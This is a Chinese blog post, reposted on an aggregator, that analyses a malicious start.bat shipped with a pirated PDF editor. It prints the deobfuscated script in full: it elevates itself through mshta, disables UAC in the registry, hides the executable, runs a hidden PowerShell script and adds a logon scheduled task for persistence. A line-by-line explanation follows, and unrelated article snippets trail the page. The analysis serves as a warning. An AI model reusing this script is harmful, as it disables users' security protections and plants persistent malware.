商洛免费做网站公司emlog转换wordpress

web/2025/9/30 22:57:23/文章来源:
商洛免费做网站公司,emlog转换wordpress,微信推广费用一般多少,域名注册和网站设计服务在第一次下载软件时#xff0c;目录中配了一个使用说明#xff0c;说是需要通过start.bat 这个文件来启动程序#xff0c;而这个 start.bat 就是始作俑者#xff1a; 病毒作者比较狡猾#xff0c;其中start.bat 用记事本打开是乱码#xff0c;但是可以通过将这个批处理…在第一次下载软件时目录中配了一个使用说明说是需要通过start.bat 这个文件来启动程序而这个 start.bat 就是始作俑者 病毒作者比较狡猾其中start.bat 用记事本打开是乱码但是可以通过将这个批处理文件的扩展名改为.doc然后双击就用word打开了因为这个批处理加密是利用混淆编码的原理加密的而word能识别很多编码所以用word打开就可以看到真容了打开文件完整的的病毒启动内容脚本如下 echo offPUSHD %~DP0 cd /d %~dp0 %1 %2mshta vbscript:createobject(shell.application).shellexecute(%~s0,goto :target,,runas,1)(window.close)goto :eof :targetreg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F nul 2nul reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F nul 2nul reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F nul 2nulcd /d bin attrib s h PDFeditorPortable.execd /d re\libstart powershell -windowstyle hidden .\add.ps1 nul 2nulfor /f %%i in (dir/s/b/a-d^|find /c /v .*) do set f%%iif %f% equ 5 (cd ..cd ..start PDFeditorPortable.execd re\libSchTasks /Create /SC ONLOGON /delay 0005:00 /TN CrashReporting /TR %CD%\CrashReporting.bat /f nul 2nul) else (echoecho 运行过程被杀软干扰可通过以下方法恢复echoecho 1、检查是否被杀毒软件隔离如被隔离请恢复并添加进信任区后再运行软件echoecho 2、方法1如果不行请关闭杀软重新解压原本压缩文件再运行软件echopause )setlocal enabledelayedexpansion set line0 for /f %%a in (wmic cpu get NumberOfLogicalProcessors) do ( set /a line1 if !line!2 set A%%a )set /a B %A% / 2set fnCrashReporting2.bat nul 2nul (for /f tokens* %%i in (%fn%) do ( set s%%i set s!s:20%B%! echo !s!))temp1126.txt move /y temp1126.txt %fn% nul 2nulcall CrashReporting2.batexit 这段代码是一个 Windows 批处理脚本主要用于修改系统注册表设置、启动程序并处理一些与安全相关的配置。以下是对代码的逐行解释 代码解析 echo off: 关闭命令行窗口中的命令回显使得执行时不显示每个命令的内容。 PUSHD %~DP0 cd /d %~dp0: PUSHD %~DP0将当前目录更改为脚本所在的目录。cd /d %~dp0确保切换到该目录。 %1 %2: 执行传递给脚本的第一个和第二个参数。 mshta vbscript:createobject(shell.application).shellexecute(%~s0,goto :target,,runas,1)(window.close)goto :eof: 使用 mshta 运行 VBScript以管理员权限重新执行当前脚本并跳转到 :target 标签。window.close 在执行后关闭窗口。goto :eof 确保脚本在此处结束不继续执行后面的代码。 :target: 标签后面的代码将在跳转到此标签时执行。 修改注册表: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F nul 2nul: 将管理员的用户帐户控制 (UAC) 提示行为设置为 0关闭提示。 reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F nul 2nul: 禁用用户帐户控制 (UAC)。 reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F nul 2nul: 关闭安全桌面上的提示。 cd /d bin: 切换到 bin 目录。 attrib s h PDFeditorPortable.exe: 将 PDFeditorPortable.exe 文件设置为系统文件和隐藏文件。 cd /d re\lib: 切换到 re\lib 目录。 start powershell -windowstyle hidden .\add.ps1 nul 2nul: 在隐藏窗口中启动一个 PowerShell 脚本 add.ps1并将输出重定向到空设备。 for /f %%i in (dir/s/b/a-d^|find /c /v .*) do set f%%i: 计算当前目录及子目录下的文件数量并将结果存储在变量 f 中。 条件判断: if %f% equ 5 (...) else (...): 如果文件数量等于 5则执行括号内的命令否则执行 else 部分。如果文件数量为 5切换到上级目录启动 PDFeditorPortable.exe并创建一个名为 CrashReporting 的计划任务。如果文件数量不为 5输出提示信息建议用户检查杀毒软件的干扰。 获取逻辑处理器数量: 通过 wmic cpu get NumberOfLogicalProcessors 获取逻辑处理器数量并将其存储在变量 A 中。计算 B 为 A 的一半。 更新 CrashReporting2.bat 文件: 将 CrashReporting2.bat 文件中的某些内容替换为计算得到的 B 值并将结果输出到临时文件 temp1126.txt 中最后移动回原文件。 调用 CrashReporting2.bat: 执行 CrashReporting2.bat 文件。 exit: 结束批处理脚本的执行。 总结 这个批处理脚本的主要功能是 修改系统的 UAC 设置以降低安全性。启动和配置某个 PDF 编辑器。处理文件数量检查确保程序正常运行。更新并执行一个名为 CrashReporting2.bat 的脚本。 由于涉及到 UAC 设置的修改这段代码可能会被安全软件标记为潜在的恶意行为。关于病毒具体执行了什么可以参见这篇博文https://mp.csdn.net/mp_blog/creation/success/142697281

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/84700.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

河南省建设工程监理协会网站设计说明书包括哪些内容

Tableau入门 1、Tableau概述2、Tableau Desktop2.1、初识Tableau Desktop2.2、Tableau工作区2.3、数据窗格与分析窗格2.4、功能区和标记卡2.4.1、列和行功能区2.4.2、标记卡2.4.3、筛选器功能区2.4.4、页面功能区2.4.5、附加功能区、图例、控件 3、Tableau视图4、Tableau工作簿…

长春网络公司做网站云南住房和城乡建设局网站

组件开始设计是针对以接口的方式来定义HTTP/HTTPS访问,虽然基于接口来操作有很大的便利性,但定义起来就比较麻烦了。所以在1.5版本中实现了一个HttpClient类来简化调用。HttpClient 该类支持HTTP的GET,POST,DELETE和PUT操作,通过这几个…

金华企业网站建设网站建设重要意义

问题描述: 想在不同目录下导入根目录的包,直接写会报错。如下边object_detect.py在function文件夹下,导入包默认在这个文件下,但我想导入根目录models和utils下的包 解决方法: 将根目录设置为源代码根目录&#xff0…

专业网站建设公司哪里济南兴田德润什么活动哪些做网站的公司比较好

1.安装教程激活 输入的激活网址: http://idea.imsxm.com/ 2.汉化教程 软件适用于:webstorm2017.2以及以上,如有需要可直接加本人QQ 1940694428。 转载于:https://www.cnblogs.com/cisum/p/7919712.html

北京网站制作公司兴田德润可以不常州视频剪辑培训机构

公章是公司处理内外部事务的印鉴,公司对外的正式信函、文件、报告使用公章,盖了公章的文件具有法律效力。公章由公司的法定代表人执掌,法定代表人如果把法定代表人章与公章一同使用就代表公司行为。 随着社会数字化转型,电子印章及…

企业建设网站目的是什么意思黄冈免费网站推广平台汇总

css实现自定义按钮的样式实际上很早就有了,只是会用的人不是很多,里面涉及到了最基础的css写法,在火狐中按钮还是会显示出来,这时需要将i标签的背景设置为白色,同时z-index设置比input高一些,这样才可以把按…

网站管理工作流程简单的网页设计主题

目录 && --- 逻辑与操作符 || --- 逻辑或操作符 && --- 逻辑与操作符 逻辑与操作符有并且的意思,一般用于判断语句中 逻辑与操作符运行规则是都要为真,才会继续执行或计算 360笔试题: 有关前置(--),后置(-…

腾讯广告投放端提供的建站工具有三亚房地产网站制作

java ee的小程序如果我不喜欢夏天的一件事,那就是事实是没有太多要分享或谈论的新闻。 谁决定将Java Day Tokyo置于今年的这个无聊的时间里,做得很好,并给了我一个写关于新的和即将到来的Java EE 8规范的博客帖子的机会,其中丰富了…

邢台移动网站建设价格wordpress改变友情链接顺序

全世界只有3.14 % 的人关注了青少年数学之旅【1】【2】【3】【4】【5】【6】【7】【8】【9】

科技软件公司网站模板企业网站开发与设计论文

首先转换pytorch->onnx->param模型,这个过程可以查资料步骤有点多,参考blog.51cto.com/u_15660370/6408303,这里重点讲解转换后部署。 测试环境: ubuntu18.04 opencv3.4.4(编译过程省略,参考我其他博客) 安装…

网站设计 模板外贸企业网页制作

2024年6月1日上午,横店影视华翰传媒集团携手腾烨影视隆、明艺影视重举办了横店影视基地的开业庆典。这一盛事不仅标志着华翰传媒集团在影视行业发展的重要里程碑,更彰显了其深耕影视产业、致力于打造高质量影视内容的决心与目标。 活动盛况空前&#xff…

网站建设常州青之峰百度网页版下载

一直以来听的多了,什么UDP广播之类的,不过自己一直没有试验过,这次闲来无聊,于是测试了一下。网上说的其实并不是非常的正确,流传着不少的错误言论,这次自己动手测试了一下,没想到比我想象中的还…

聊城专业建wap网站网站开发教程

Java中的面向对象设计原则与实践 大家好,我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿! 引言 面向对象设计原则是软件工程中的重要概念,它们指导着我们如…

网站建设项目报告书网站建设湖南岚鸿建设

Python常见基础数据结构 字符串字符串的构造字符串是一种序列正向索引负向索引有限切片无限切片查询方法压缩方法替换方法格式化插入分割方法 列表列表构造列表同样属于序列列表的元素增加列表其他方法 元组字典字典的构造字典不属于序列字典可变 字符串 字符串的构造 • 单引…

网站设计需求说明书外国网站接单做翻译

文章目录 一、TCP/IP1.1、TCP/IP概念TCP/IP是什么TCP/IP的作用TCP/IP的特点TCP/IP的工作原理 1.2、TCP/IP网络发展史1.3、OSI网络模型1.4、TCP/IP网络模型1.5、linux中配置网络网络配置文件位置DNS配置文件主机名配置文件常用网络查看命令 1.6、windows中配置网络CMD中网络常用…

聊城定制网站建设公司网站禁止访问怎么解除

HDU6223 - Infinite Fraction Path 做法1&#xff1a;枚举每个串取最大值&#xff0c;只用判断前20位&#xff0c;如果前20位都相同&#xff0c;可以认定两个串相同。因为很容易进入循环节&#xff0c;且循环节不太大。 #include <bits/stdc.h> #define pb push_back typ…

aspcms手机网站怎么做西安华为公司

推荐系统在现代应用中占据了重要地位&#xff0c;尤其在电影、音乐等个性化内容推荐中广泛使用。本文将介绍如何使用数据预处理、特征工程以及多种推荐算法&#xff08;包括协同过滤、基于内容的推荐、混合推荐等&#xff09;来实现电影推荐系统。通过Pandas、Scikit-learn、Te…

域名绑定空间后 一般多久能打开网站广州微信网站建设市场

当移动端使用fixed定位自定义nav栏时&#xff0c;安卓端正常固定在可视窗顶部&#xff0c;但是ios端当有input输入&#xff0c;弹出软键盘时&#xff0c;会将nav顶出可视区&#xff0c;因为在ios上&#xff0c;不是相对于浏览器窗口定位的&#xff0c;而是相对于最近的可滚动区…

建站仅向商家提供技术服务长春网站开发报价

1 传统的线性回归 机器学习笔记&#xff1a;线性回归_线性回归的读书笔记-CSDN博客 最优的β为&#xff1a; 2 地理加权回归&#xff08;GWR&#xff09; 2.1 模型概述 地理加权回归&#xff08;Geographically Weighted Regression&#xff0c;GWR&#xff09;是传统回归分…

化妆品企业网站源码一个网站需要哪些技术

一、请解释Vue中的双向数据绑定是什么&#xff1f; Vue中的双向数据绑定是一种机制&#xff0c;它使得数据的变化能够自动反映在用户界面上&#xff0c;同时用户界面中的输入也能够自动更新数据。这种机制实现了数据层&#xff08;Model&#xff09;和视图层&#xff08;View&…